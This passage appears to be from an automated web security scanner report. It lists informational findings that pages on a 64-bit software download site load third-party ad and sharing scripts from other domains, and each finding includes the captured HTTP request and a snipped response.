Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-synchronize-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1392. http://www.x64bitdownload.com/64-bit-topic-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-topic-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-topic-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22topic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 84529


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1393. http://www.x64bitdownload.com/64-bit-troll-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-troll-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-troll-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:52 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1394. http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-troll-killer-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-troll-killer-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22troll-killer%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22troll+killer%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31427


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1395. http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-trollkiller-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-trollkiller-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22trollkiller%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28488


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1396. http://www.x64bitdownload.com/64-bit-use-next-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-use-next-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-use-next-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1397. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37040


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1398. http://www.x64bitdownload.com/64-bit-usenet-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-usenet-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1399. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenet-search-engine-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-usenet-search-engine-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1400. http://www.x64bitdownload.com/64-bit-usenext-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-usenext-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-usenext-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1401. http://www.x64bitdownload.com/64-bit-video-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-video-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-video-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1402. http://www.x64bitdownload.com/64-bit-xpat-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-xpat-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-xpat-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:08 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28893


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1403. http://www.x64bitdownload.com/64-bit-yenc-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-yenc-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-yenc-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1404. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /a-oz-insight-1768-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /a-oz-insight-1768-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:08 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 26030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
